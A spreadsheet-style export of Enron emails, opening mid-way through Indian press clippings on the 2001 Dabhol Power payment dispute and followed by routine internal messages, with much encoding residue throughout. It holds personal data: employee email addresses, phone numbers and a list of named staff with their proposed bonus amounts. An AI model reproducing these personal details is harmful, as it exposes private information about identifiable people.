York-based legal firm  White &amp; Case -- defending their stance saying they a=_x000D_
re=20_x000D_
working in the best interest of the  project. The lenders are expected to=_x000D_
=20_x000D_
meet in London over the next fortnight to take stock of the situation.The=_x000D_
=20_x000D_
deadline for resolving the issues are drawing to a close as 10 days of the=_x000D_
=20_x000D_
three-week reprieve  have passed. At the DPC board meeting in London on May=_x000D_
=20_x000D_
25, the lenders had managed to stall the issuance    of the termination=20_x000D_
notice and got three weeks=01, time for themselves to convince the Centre a=_x000D_
s =20_x000D_
well as the Maharashtra government to resolve  the impasse on the=20_x000D_
controversial project. In a letter to finance secretary Ajit Kumar dated=20_x000D_
April 30, the global arrangers said the  government must own up its=20_x000D_
responsibility and  meet its obligations without further delay. Among the=_x000D_
=20_x000D_
stiff conditions, set by the arrangers, are the demand that the central=20_x000D_
government  ensure payment of all the pending bills of MSEB  for December=_x000D_
=20_x000D_
2000, January 2001, February  2001 and March 2001 which remain unpaid =20_x000D_
without any protest or reservation by May 7  (Monday).=20_x000D_
_x000D_
Any payment previously made under =01&amp;protest=018 should be made free and c=_x000D_
lear of=20_x000D_
such protest or  any other reservation, and the Center should   ensure time=_x000D_
ly=20_x000D_
payment of future bills by MSEB,  they said. Meanwhile, sources said that t=_x000D_
he=20_x000D_
finance secretary was expected to meet the international lenders to the=20_x000D_
Dabhol projects in London stand on the issue. The lenders=01, list of deman=_x000D_
ds=20_x000D_
also include asking  MSEB to take steps required under the existing =20_x000D_
contracts to activate the escrow arrangements  put in place at the time of=_x000D_
=20_x000D_
financial close of Phase II of the Project by May 7.=20_x000D_
_x000D_
They have demanded that the Union government and the Maharashtra government=_x000D_
=20_x000D_
should take all required actions to ensure that no government agency will=_x000D_
=20_x000D_
take any step to impede the operation   of Phase I or the construction and=_x000D_
=20_x000D_
operation of  Phase II without due cause. The lenders have also asked them =_x000D_
to=20_x000D_
ensure that the relevant customs authorities permit import of all goods and=_x000D_
=20_x000D_
equipment required for the Project  by May 21. CSFB, ANZ Export Finance,=20_x000D_
Citi, Bank Of America and ABN Amro are the global arrangers for both phase =_x000D_
I=20_x000D_
as well as phase II of  the project.=20_x000D_
_x000D_
The State Bank of India, which is also a global arranger for phase II, did=_x000D_
=20_x000D_
not sign the letter. "Ten days have passed since the lenders bought three=_x000D_
=20_x000D_
weeks time from the company delaying its declaration of the termination of=_x000D_
=20_x000D_
the PPA. Since then, nothing has moved at the material level barring MSEB's=_x000D_
=20_x000D_
payment of the January bill to the tune of Rs 134 crore under protest," sai=_x000D_
d=20_x000D_
a  source among the global arrangers. come forward to meet its obligations=_x000D_
=20_x000D_
The lenders  are planning to meet around mid-May in London  and this time=_x000D_
=20_x000D_
they will be left with no choice but to give the go-ahead to the company to=_x000D_
=20_x000D_
terminate the PPA unless the finance ministry comes forward to settle the=_x000D_
=20_x000D_
issue, the source added. The lenders are, however, not ready to take the =_x000D_
=20_x000D_
blame for any delay in the termination of PPA as implied by the company. Th=_x000D_
e=20_x000D_
White &amp; Case statement said the lenders are  concerned about the fate of th=_x000D_
e=20_x000D_
project and they  are exploring all intermediate steps before  choosing the=_x000D_
=20_x000D_
last option -- termination of PPA.=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
BUSINESS STANDARD, Saturday, 5 May, 2001_x000D_
GE may pull out as DPC supplier , S Ravindran in Mumbai_x000D_
_x000D_
After US-based Bechtel, it is now the turn of General Electric to review it=_x000D_
s=20_x000D_
participation as equipment supplier to the controversial 2,184-mw power=20_x000D_
project in Maharashtra, being set up by the Dabhol Power Company.Bechtel is=_x000D_
=20_x000D_
the EPC contractor to the project while GE has supplied the equipment,=20_x000D_
primarily turbines.General Electric, like Bechtel, also holds 10 per cent i=_x000D_
n=20_x000D_
Dabhol Power Company (DPC). And both Bechtel and General Electric are worri=_x000D_
ed=20_x000D_
about future payments from DPC. Sources familiar with the project said that=_x000D_
=20_x000D_
so far DPC has not defaulted in its payments to General Electric. What is=_x000D_
=20_x000D_
worrying General Electric is the possible scenario after June 7, when about=_x000D_
=20_x000D_
700 mw power will be commissioned after the second phase  trial runs._x000D_
_x000D_
DPC and the Maharashtra State Electricity Board  (MSEB) have been locked in=_x000D_
 a=20_x000D_
payments dispute for months. If MSEB continues with its stance, DPC in turn=_x000D_
=20_x000D_
may not be able to pay General Electric. In such a situation, GE may walk o=_x000D_
ut=20_x000D_
of the project. A final decision will be taken only in June, said sources.=_x000D_
=20_x000D_
General Electric did not respond to a faxed questionnaire sent by Business=_x000D_
=20_x000D_
Standard. Senior executives at its public relations agency Burson  =20_x000D_
Marsteller Roger Pereira said that only DPC executives were authorised to=_x000D_
=20_x000D_
speak on the issue. The DPC spokesman declined to comment on the issue._x000D_
_x000D_
The first phase of the 740 mw has already been commissioned. After the seco=_x000D_
nd=20_x000D_
phase of 1,444 mwis commissioned by December, 2001, MSEB will  have to pay=_x000D_
=20_x000D_
DPC a minimum of Rs 500 crore per month. The escrow account for this was to=_x000D_
=20_x000D_
have been made operational by April 7, 2001. MSEB has refused to do this.=_x000D_
=20_x000D_
Earlier, DPC had invoked the political force majeure clause in its contract=_x000D_
=20_x000D_
with the board. MSEB is now arguing that the invocation of this clause has=_x000D_
=20_x000D_
absolved DPC of all its liabilities.=20_x000D_
_x000D_
Consequently, it will not operationalise the escrow account. This casts a=_x000D_
=20_x000D_
further shadow over DPC=01,s ability to pay General Electric and Bechtel. T=_x000D_
his=20_x000D_
is worrying the lenders to the project as well. The situation has taken a=_x000D_
=20_x000D_
turn for the worse with DPC practically refusing to re-negotiate the contra=_x000D_
ct=20_x000D_
for the second phase with the Godbole panel constituted by the Maharashtra=_x000D_
=20_x000D_
government.=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
HINDU BUSINESSLINE, May 5, 2001_x000D_
Agenda for fresh talks with Enron chalked out=20_x000D_
_x000D_
OFFICIALS of the State Government, Maharashtra State Electricity Board (MSE=_x000D_
B)=20_x000D_
and members of the Madhav Godbole committee, which recently submitted its=_x000D_
=20_x000D_
review on the Dabhol Power project, met here on Saturday. The meeting was t=_x000D_
o=20_x000D_
``chart the agenda for renegotiation with Enron officials,'' a senior MSEB=_x000D_
=20_x000D_
official said. Enron officials were scheduled to attend this meeting but=20_x000D_
backed out on May 3. Enron had informed the State Government that it would=_x000D_
=20_x000D_
not accept the                      recommendations of the Godbole committe=_x000D_
e.=20_x000D_
`It is understandable that the company does not find the recommendations=20_x000D_
acceptable. But the report is not bound to personal opinions,'' the officia=_x000D_
l=20_x000D_
said. The next meeting to decide the direction of renegotiation process wit=_x000D_
h=20_x000D_
Enron is  scheduled on May 11._x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, May 6, 2001_x000D_
Godbole panel meets sans Dabhol representation=20_x000D_
_x000D_
THE GODBOLE Committee, set up for renegotiating the estranged power purchas=_x000D_
e=20_x000D_
agreement between US energy major Enron-promoted Dabhol Power Company and t=_x000D_
he=20_x000D_
state electricity board on Saturday held its first internal meeting sans=20_x000D_
representatives of the multinational. "It was an internal meeting to take=_x000D_
=20_x000D_
stock of the current situation and decide on matter pertaining to the May 1=_x000D_
1=20_x000D_
meet with officials of Enron, GE, Bechtel and DPC's foreign lenders," said=_x000D_
=20_x000D_
state government sources. The meeting, which lasted for almost four hours,=_x000D_
=20_x000D_
discussed a strategy to present the committee's recommendations made public=_x000D_
=20_x000D_
last month, they said.=20_x000D_
_x000D_
Of the nine members of the committee, Saturday's meeting was attended by fi=_x000D_
ve=20_x000D_
members -- including Godbole, MSEB chairman Vinay Bansal, state energy=20_x000D_
secretary V M Lal, state finance secretary Sudhir Shrivastava and Kirit=20_x000D_
Parekh of Indira Gandhi Institute of Developmental Research. Those absent=_x000D_
=20_x000D_
were HDFC chairman Deepak Parekh, Teri director R K Pachauri, former union=_x000D_
=20_x000D_
energy secretary EAS Sarma and yet-to-be-appointed representatives of the=_x000D_
=20_x000D_
Centre and Central Electricity Authority. The negotiating committee would=_x000D_
=20_x000D_
suggest solutions to bring down the exorbitant power tariff, separating of=_x000D_
=20_x000D_
the liquefied natural gas facility, restructuring of DPC and allowing sale =_x000D_
of=20_x000D_
excess power through central utilities mainly the National Thermal Power=20_x000D_
Corporation, said sources. (PTI_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE ECONOMIC TIMES, May 5, 2001_x000D_
NTPC not to buy power from Enron: Govt_x000D_
_x000D_
THE CENTRE has ruled out the possibility of National Thermal Power=20_x000D_
Corporation buying power generated by US energy giant Enron-promoted Dabhol=_x000D_
=20_x000D_
Power Company. Union power minister Suresh Prabhu is learnt to have stated=_x000D_
=20_x000D_
this during the meeting with Maharashtra chief minister Vilasrao Deshmukh=_x000D_
=20_x000D_
last month, convened by the finance minister Yashwant Sinha to discuss the=_x000D_
=20_x000D_
Enron crisis, said government sources on Friday.=20_x000D_
_x000D_
Prabhu had pointed out that "there is no question of NTPC buying power from=_x000D_
=20_x000D_
the project since long-term power purchase agreements have been signed by=_x000D_
=20_x000D_
NTPC with the buying states". Maharashtra chief minister Vilasrao Deshmukh=_x000D_
=20_x000D_
during the meeting suggested that the central power utility sell the excess=_x000D_
=20_x000D_
power over and above the 300-400 mw needed for the state from the 740 mw=20_x000D_
phase-I and soon-to-be-commissioned phase-II of 1,444-mw, to other needy=20_x000D_
states. When contacted, Prabhu said the entire controversy over payment=20_x000D_
default by Maharashtra State Electricity Board owing to high cost of power=_x000D_
=20_x000D_
generated by DPC had to be resolved between the state government, and DPC a=_x000D_
nd=20_x000D_
Centre had very limited role to play. DPC has already slapped one=20_x000D_
conciliation notice on the Centre and three arbitration notices on the stat=_x000D_
e=20_x000D_
government over non-payment of dues amounting to Rs 213-crore-plus interest=_x000D_
=20_x000D_
rate towards bills due for the months of December 2000 and January 2001. (P=_x000D_
TI)_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------_x000D_
THE TIMES OF INDIA, May 7, 2001_x000D_
MSEB recovers Rs 3.06 cr arrears in one day=20_x000D_
_x000D_
In a special day-long drive, Nagpur rural zone of Maharashtra State=20_x000D_
Electricity Board (MSEB) has recovered Rs 3.06 crore as arrears from the=20_x000D_
defaulters who had to pay a handsome dividend, and disconnected15,000=20_x000D_
connections of erring customers last week. According to MSEB sources, under=_x000D_
=20_x000D_
the drive, initiated by chief engineer Manohar Bapat, with the assistance o=_x000D_
f=20_x000D_
about 5,000 employees including engineers, accounts staff and linesmen, a=_x000D_
=20_x000D_
door-to-door campaign was launched to meet 25,000 customers, leading to the=_x000D_
=20_x000D_
recovery of the dues. Power supply to 15,000 customers were disconnected on=_x000D_
=20_x000D_
the spot due to non-payment of arrears in Chandrapur, Gadchiroli, Wardha,=_x000D_
=20_x000D_
Bhandara, Gondia and Nagpur districts, it said in a release. The drive met=_x000D_
=20_x000D_
with stiff resistence from public and the police were called in at many=20_x000D_
places to assist the powermen, it added.=20_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 04:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kimat.singla@enron.com'})</t>
  </si>
  <si>
    <t>Re: Sale to NYPA</t>
  </si>
  <si>
    <t xml:space="preserve">At TGT/ZSL mid i.e. _x000D_
    Index                      5.01_x000D_
    Other fee        .01_x000D_
    Physical Prem          .005_x000D_
    Total                          5.025_x000D_
_x000D_
Questions, please call._x000D_
_x000D_
Kimat_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Chris Germany                           03/08/2001 08:23 AM_x000D_
	_x000D_
_x000D_
To: Kimat Singla/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sale to NYPA_x000D_
_x000D_
What mid price does this deal come to TP2 at?   Deal 655067_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 05:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dan.junek@enron.com', 'mike.maggi@enron.com', 'jim.schwieger@enron.com', 'dick.jenkins@enron.com', 'judy.townsend@enron.com', 'andrew.lewis@enron.com', 'greg.mcclendon@enron.com', 'jay.reitmeyer@enron.com', 'patrice.mims@enron.com', 'sylvia.pollan@enron.com', 'geoff.storey@enron.com', 'keith.holst@enron.com', 'daren.farmer@enron.com', 'brad.mckay@enron.com', 'lauri.allen@enron.com', 'danny.conner@enron.com', 'jason.williams@enron.com', 'andrea.ring@enron.com', 'scott.neal@enron.com', 'scott.hendrickson@enron.com', 'tammi.depaolis@enron.com', 'larry.may@enron.com', 'monique.sanchez@enron.com', 'robin.barbe@enron.com', 'elsa.villarreal@enron.com', 'mike.grigsby@enron.com', 'carey.metz@enron.com', 'tom.donohoe@enron.com', 'phillip.allen@enron.com', 'stacey.neuweiler@enron.com', 'gary.lamphier@enron.com', 'john.taylor@enron.com', 'susan.pereira@enron.com', 'martin.cuilla@enron.com', 'chris.germany@enron.com', 'matthew.lenhart@enron.com', 'thomas.martin@enron.com', 'jane.tholt@enron.com', 'kelli.stevens@enron.com', 'jared.kaiser@enron.com', 'kevin.ruscitti@enron.com', 'steven.south@enron.com', 'hunter.shively@enron.com', 'liz.bellamy@enron.com', 'sandra.brawner@enron.com', 'kenneth.shulklapper@enron.com', 'peter.keavey@enron.com', 'edward.gottlob@enron.com', 'john.arnold@enron.com'})</t>
  </si>
  <si>
    <t>Implementation of the Gas Message Board Application</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the following instructions for the new messenging board.  If you _x000D_
have any trouble entering into this site, please let me know.  Everyone _x000D_
should now be setup and ready to go. You will have to add this site to one of _x000D_
your favorites.  _x000D_
_x000D_
The Gas Message Board application can run on both IE5.0 and IE5.5 now. _x000D_
_x000D_
Attached is the URL for user to run the application._x000D_
_x000D_
http://gasmsgboard.dev.corp.enron.com_x000D_
_x000D_
Please feel free to forward above URL to people who like to test the _x000D_
application. _x000D_
_x000D_
Here is the steps they should do:_x000D_
_x000D_
1) Launch Internet Explorer_x000D_
_x000D_
2) Type: http://gasmsgboard.dev.corp.enron.com (or just open this email and _x000D_
click on above URL)_x000D_
_x000D_
3) Users should see the messages if there is any new messages for today. If _x000D_
they don't see any messages, there are two reasons: _x000D_
 (1) They are not valid users. Their names have not been added into the NT _x000D_
Web_GasTraders Group yet. Please contact Chrysti Hardy to add their names _x000D_
into the group._x000D_
 (2) There is no new messages added yet._x000D_
_x000D_
4) Click on "Comments" button to add messages: there will be a popup window _x000D_
when user clicks on "comments" button. There are two ways to send the _x000D_
messages after typing the _x000D_
messages into the text box:_x000D_
 (1) just simply press enter to send the message. or_x000D_
 (2) click on "send" button to send the message._x000D_
_x000D_
5) After the message has been sent, The message will be displayed on the main _x000D_
window immediately, the rest people who are online will get the new message _x000D_
in less than 30 seconds. This time can be reduced to as less as 1 second. _x000D_
However, I would not recommend to reduce the time interval less than 10 _x000D_
second.  Because each time the browser refreshes the screen, the screen will _x000D_
be blink. Users don't want the screen blink every second while they read the _x000D_
messages._x000D_
_x000D_
6) All messages will be cleaned up daily at 6:00PM. If they like to clean _x000D_
them up later than 6:00PM, please let me know. I can reset the time._x000D_
_x000D_
Note: Right now the application is under test environment. If they like it, I _x000D_
will move it into production environment soon._x000D_
_x000D_
Let me know any feedbacks._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fangming_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 23:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Meeting at 2:00pm Friday</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin,_x000D_
_x000D_
Can you join us? I  may be 5  minutes late, coming from another meeting._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/15/2000 _x000D_
07:59 AM ---------------------------_x000D_
_x000D_
_x000D_
Wenyao Jia_x000D_
12/14/2000 06:24 PM_x000D_
To: Debbie R Brackett/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Meeting at 2:00pm Friday_x000D_
_x000D_
_x000D_
We will meet at Debbie's office at 2:00pm tomorrow afternoon.  We will talk _x000D_
about asset liability project from treasury dept._x000D_
_x000D_
See you there._x000D_
_x000D_
Winston_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 10:37:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cindy.olson@enron.com', 'sarah.palmer@enron.com'})</t>
  </si>
  <si>
    <t>RE: Revised LIOTL E-Mail Script</t>
  </si>
  <si>
    <t>Has Koenig seen the IR section?  I don't agree with the statement that they have not done a good job communicating with analysts and investors.  I can't believe he would think that's accurate._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Palmer, Sarah  _x000D_
Sent:	Friday, September 21, 2001 11:37 AM_x000D_
To:	Denne, Karen; Kean, Steven J._x000D_
Cc:	Clark, Mary; McVicker, Maureen_x000D_
Subject:	Revised LIOTL E-Mail Script_x000D_
Importance:	High_x000D_
_x000D_
Steve and Karen,_x000D_
_x000D_
Here is the latest draft of the Lay It On the Line memo from Ken.  Cindy made some signficant changes this morning.  Some of the action items removed were mandatory vacation, leadership training, online communications training, the function of Employee Relations and the employee task force.   Mary and I agree that, as it stands now, there is not nearly enough "meat" to warrant a communication to employees.  Sending out a memo with a "theoretical" approach and few significant, tangible action items will backfire.  As an FYI, I was told by several people, including one in HR, that employees are reacting very sensitively to any changes that are announced.  I think we should wait to communicate this until we have solid, positive action items._x000D_
_x000D_
_x000D_
 &lt;&lt; File: laysurveymemo.doc &gt;&gt; _x000D_
Warm regards,_x000D_
Sarah Palmer_x000D_
Internal Communications Manager_x000D_
Enron Public Relations_x000D_
(713) 853-9843</t>
  </si>
  <si>
    <t>Mon, 10 Jan 2000 07:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Proposed bonuses</t>
  </si>
  <si>
    <t>Greg,_x000D_
_x000D_
These are proposed bonuses:_x000D_
_x000D_
Managers:_x000D_
_x000D_
Superior_x000D_
_x000D_
1. Ravi Thuraisingham  40K  _x000D_
2. Ronnie Chahal   40K_x000D_
3. Amitava  Dhar   40K_x000D_
_x000D_
_x000D_
Excellent_x000D_
_x000D_
1. Osman Sezgen   35K_x000D_
2. Tanya Tamarchenko  35K_x000D_
3. Joe Hrgovcic   30K_x000D_
4. Vincent Tang   30K_x000D_
_x000D_
_x000D_
Directors:_x000D_
_x000D_
Superior_x000D_
_x000D_
1. Mike Roberts   100K_x000D_
2. Krishnarao Pinnamaneni  60K_x000D_
_x000D_
_x000D_
Excellent_x000D_
_x000D_
1. Zimin Lu   50K_x000D_
2. Maureen Raymond  40K_x000D_
_x000D_
_x000D_
Assistants:_x000D_
_x000D_
1. Shirley Crenshaw   6K_x000D_
2. Robert Moore   5K_x000D_
_x000D_
You already have the VP numbers._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 16:32:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bharsh@puget.com'})</t>
  </si>
  <si>
    <t>frozenset({'eswg@wscc.com'})</t>
  </si>
  <si>
    <t>FW: Announcement - ESC Membership Registration</t>
  </si>
  <si>
    <t xml:space="preserve">WSCC ESWG - _x000D_
_x000D_
Here's what we have been waiting for.  Its the sector voting registration_x000D_
site.  You'll need a browser with 128 bit encryption to get in (guess I'll_x000D_
have to go home to do that)._x000D_
_x000D_
So go tell everyone you know who qualifies for one of the these sectors to_x000D_
register._x000D_
_x000D_
John Canavan from Montana Power has put forth his name to be considered for_x000D_
the ESC Vice Chair officer position._x000D_
_x000D_
Remember, in order to vote for the officers at the Denver/April ESC meeting_x000D_
you need to be there and be registered._x000D_
_x000D_
_x000D_
Robert Harshbarger_x000D_
Puget Sound Energy_x000D_
OASIS Trading Manager_x000D_
425.462.3348 (desk)_x000D_
206.604.3251 (cell)_x000D_
mailto:bharsh@puget.com_x000D_
_x000D_
_x000D_
&gt; ----------_x000D_
&gt; From: 	Barbara Bogenrief[SMTP:Barbara.Bogenrief@nerc.net]_x000D_
&gt; Sent: 	Wednesday, February 06, 2002 12:25 PM_x000D_
&gt; To: 	Barbara Bogenrief_x000D_
&gt; Subject: 	Announcement - ESC Membership Registration_x000D_
&gt; _x000D_
&gt; TO:	NERC ROSTER_x000D_
&gt; 	STANDARDS LISTSERVER GROUP_x000D_
&gt; 	OPERATING MANUAL OWNERS_x000D_
&gt; 	SYSTEM OPERATOR TRAINERS_x000D_
&gt; 	ELECTRONIC SCHEDULING COLLABORATIVE_x000D_
&gt; 	OASIS STANDARDS COLLABORATIVE_x000D_
&gt; _x000D_
&gt; The Electronic Scheduling Collaborative is a collaboration of Stakeholders_x000D_
&gt; in the Wholesale Electric Power Industry joined for the purpose of_x000D_
&gt; developing standard Business Practices for Open Access Same-Time_x000D_
&gt; Information System (OASIS) Phase II and Electronic Scheduling._x000D_
&gt; _x000D_
&gt; At its January 2002 meeting, the Electronic Scheduling Collaborative (ESC)_x000D_
&gt; adopted the Governance and Bylaws that require industry sector voting. The_x000D_
&gt; ESC will conduct business in accordance with the new Governance and Bylaws_x000D_
&gt; at its February 2002 meeting. Please see Section III: Members of the_x000D_
&gt; Bylaws._x000D_
&gt; _x000D_
&gt; If you plan to participate as an "Active Member" (i.e. represent a_x000D_
&gt; legitimate industry stakeholder) and vote, you must register and select_x000D_
&gt; the segment you will represent. The complete registration process and_x000D_
&gt; forms can be found at the following web site:_x000D_
&gt; _x000D_
&gt; https://www.nerc.net/esc_x000D_
&gt; _x000D_
&gt; The Governance and Bylaws are posted on the web site below:_x000D_
&gt; _x000D_
&gt; https://www.nerc.net/esc/RelatedFiles.asp_x000D_
&gt; _x000D_
&gt; Please contact Gordon Scott (Gordon.Scott@nerc.net) if you have any_x000D_
&gt; questions. Thank you._x000D_
&gt; _x000D_
&gt; _x000D_
&gt; Barbara S. Bogenrief _x000D_
&gt; Secretary-Operations _x000D_
&gt; North American Electric Reliability Council _x000D_
&gt; Princeton Forrestal Village _x000D_
&gt; 116-390 Village Boulevard, Princeton, NJ 08540 _x000D_
&gt; (609) 452-8060, fax (609) 452-9550 _x000D_
&gt; E-mail: barbara.bogenrief@nerc.com_x000D_
&gt; </t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 07:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NDA for Sun Microsystems, Inc.</t>
  </si>
  <si>
    <t>Hi Tana--_x000D_
_x000D_
Rex would like to move forward with the Sun NDA using the exact language as _x000D_
the recent iPlanet NDA, except with "Sun Microsystems, Inc." instead of _x000D_
"iPlanet."_x000D_
_x000D_
This is because the initial Sun discussions will be only with the business _x000D_
development people and there will be no engineers or software developers in _x000D_
the room, so the residuals clause is OK as Sun likes it._x000D_
_x000D_
For now, this new NDA could take the place of any Sun NDA in progress._x000D_
_x000D_
Please let me know if you need any more information before sending this out._x000D_
_x000D_
Thanks,_x000D_
Mark P._x000D_
_x000D_
_x000D_
Input info for the NDA_x000D_
--------------------------------_x000D_
_x000D_
Legal name of the company:_x000D_
 Sun Microsystems, Inc._x000D_
_x000D_
Business contact name at the company (who will receive the NDA):_x000D_
 John Fowler_x000D_
_x000D_
Business contact email &amp; phone (&amp; fax, if applicable):_x000D_
 john.fowler@sun.com_x000D_
 phone 650-336-0945_x000D_
 _x000D_
Company's address:_x000D_
 901 San Antonio Rd._x000D_
 Palo Alto, CA  94303-4900_x000D_
_x000D_
Nature of discussion:_x000D_
 Project Offline_x000D_
_x000D_
NDA delivery method:_x000D_
 Email_x000D_
_x000D_
Other delivery needed? (hard copy sent by mail, Fedex, fax): _x000D_
 No_x000D_
_x000D_
Legal contact at the company (optional but helpful):_x000D_
 ENE legal may already have this.</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 07:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Blazer Ticket Specials - March</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kate Symes/PDX/ECT on 02/16/2001 03:41 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Ryan Langan &lt;ryan.langan@ripcity.com&gt; on 02/16/2001 02:16:19 PM_x000D_
To: "'kate.symes@enron.com'" &lt;kate.symes@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Blazer Ticket Specials - March_x000D_
_x000D_
_x000D_
Hi Kate,_x000D_
_x000D_
I have been recieving quite a few calls from your employees.  I hope they_x000D_
have been enjoying these emails.  Here are the games in March I am able to_x000D_
offer a special rate to your employees.  Thanks again for passing the_x000D_
information on.  I hope all is well!_x000D_
_x000D_
&gt; Here are the upcoming Blazer specials for all Enron employees!_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Blue Section (lower level endzone)  - $47 (normally $69 - available for_x000D_
&gt; limited  games)_x000D_
&gt;_x000D_
&gt; Purple section (upper level center) - $20  (Normally $23)_x000D_
&gt;_x000D_
&gt; Tan section (upper level behind basket) - $10_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  *BONUS* - each ticket comes with worth of $3 Blazer Bucks (good for food_x000D_
&gt; and_x000D_
&gt;  beverage in the arena)_x000D_
&gt;_x000D_
&gt; ** Preferred seating is still available for games sold out in the general_x000D_
&gt; seating **_x000D_
&gt;_x000D_
&gt;  To see a map with the colored sections go to http://www.blazers.com and_x000D_
&gt;  click on arena and tickets..._x000D_
&gt;_x000D_
&gt;  Upcoming games:_x000D_
&gt;_x000D_
&gt; March 1 - L.A. Clippers_x000D_
&gt; March 3 - Golden State Warriors_x000D_
&gt; March 6 - Vancouver Grizzlies (Clyde Drexlers Jersey Retirement)_x000D_
&gt; March 8 - San Antonio Spurs_x000D_
&gt; March 14 - Phoenix Suns_x000D_
&gt; March 16 - Utah Jazz_x000D_
&gt; March 26 - L.A. Clippers_x000D_
&gt; March 28 - Dallas Mavericks_x000D_
&gt; March 30 - New York Knicks_x000D_
&gt;_x000D_
&gt;  OR - Call for any future Blazer game!!_x000D_
&gt;_x000D_
&gt;  For tickets please call Ryan Langan @ 503-797-9936 or e-mail:_x000D_
&gt; ryan.langan@ripcity.com_x000D_
&gt;_x000D_
&gt; Call ASAP if you would like GREAT seats for tomorrows game against the_x000D_
&gt; Celtics!_x000D_
&gt; _x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 11:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>(00-334) Proposed Amendments to COMEX SIlver Futures Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Notice No. 00-334_x000D_
September 29, 2000_x000D_
_x000D_
_x000D_
TO:_x000D_
ALL NYMEX DIVISION MEMBERS AND MEMBER FIRMS_x000D_
ALL COMEX DIVISION MEMBERS AND MEMBER FIRMS_x000D_
_x000D_
FROM: Neal Wolkoff, Executive Vice President_x000D_
_x000D_
SUBJECT:_x000D_
Proposed Amendments to the COMEX Silver Futures Contract to Add Brink=01,s =_x000D_
Inc.=20_x000D_
and Delaware Depository Service Company, LLC as Exchange Licensed=20_x000D_
Depositories._x000D_
_x000D_
_x000D_
The Exchange proposes to amend Supplement No. 2, "Licensed Depositories and=_x000D_
=20_x000D_
Weighmasters for Silver" of the COMEX Silver Futures Contracts to add Brink=_x000D_
=01,s=20_x000D_
Inc.=01,s vault facility located at 652 Kent Avenue, Brooklyn, NY and Delaw=_x000D_
are=20_x000D_
Depository Service Company, LLC=01,s vault facilities located at 3601 North=_x000D_
=20_x000D_
Market Street and 4200 Governor Printz Boulevard, Wilmington, DE as license=_x000D_
d=20_x000D_
depositories for the storage of silver deliverable against the Exchange=01,=_x000D_
s=20_x000D_
COMEX Division Silver Futures Contract.  The proposed amendments must be=20_x000D_
approved by the Commodity Futures Trading Commission (CFTC).  The Exchange=_x000D_
=20_x000D_
membership will be notified when CFTC approval is received and when these=_x000D_
=20_x000D_
amendments will become effective._x000D_
_x000D_
Copies of the proposed amendments are attached. Capital letters indicate=20_x000D_
additions, bracketing [ ] indicates deletions._x000D_
_x000D_
Should you have any questions regarding the above, please contact Albert J.=_x000D_
=20_x000D_
Getz at 212-299-2608._x000D_
_x000D_
Silver Supplement No. 2 Proposed Rule Amendments_x000D_
Capital letters indicate additions; [ ] indicate deletions._x000D_
_x000D_
Commodity Exchange, Inc._x000D_
_x000D_
Licensed Depositories and Weighmasters for Silver_x000D_
_x000D_
New York_x000D_
_x000D_
Depository:_x000D_
ScotiaMocatta Depository,_x000D_
A Division of The Bank of Nova Scotia_x000D_
4 World Trade Center_x000D_
New York, NY 10048_x000D_
Orders: 212-912-8530_x000D_
_x000D_
Facilities:_x000D_
4 World Trade Center_x000D_
New York, NY_x000D_
_x000D_
Computer Code: 3002_x000D_
_x000D_
_x000D_
Depository:_x000D_
HSBC Bank_x000D_
1 West 39th Street, SC 2 Level_x000D_
New York, NY 10018_x000D_
Orders: 212-525-6439_x000D_
_x000D_
Facilities:_x000D_
1 West 39th Street, SC Level 2_x000D_
New York, NY_x000D_
_x000D_
Computer Code: 5001_x000D_
_x000D_
_x000D_
Depository:_x000D_
BRINK'S INCORPORATED_x000D_
SUITE 400_x000D_
580 5TH AVENUE_x000D_
NEW YORK, NY 10036_x000D_
ORDERS: 718-260-2200_x000D_
_x000D_
Facilities:_x000D_
642 KENT AVENUE_x000D_
BROOKLYN, NY_x000D_
_x000D_
_x000D_
_x000D_
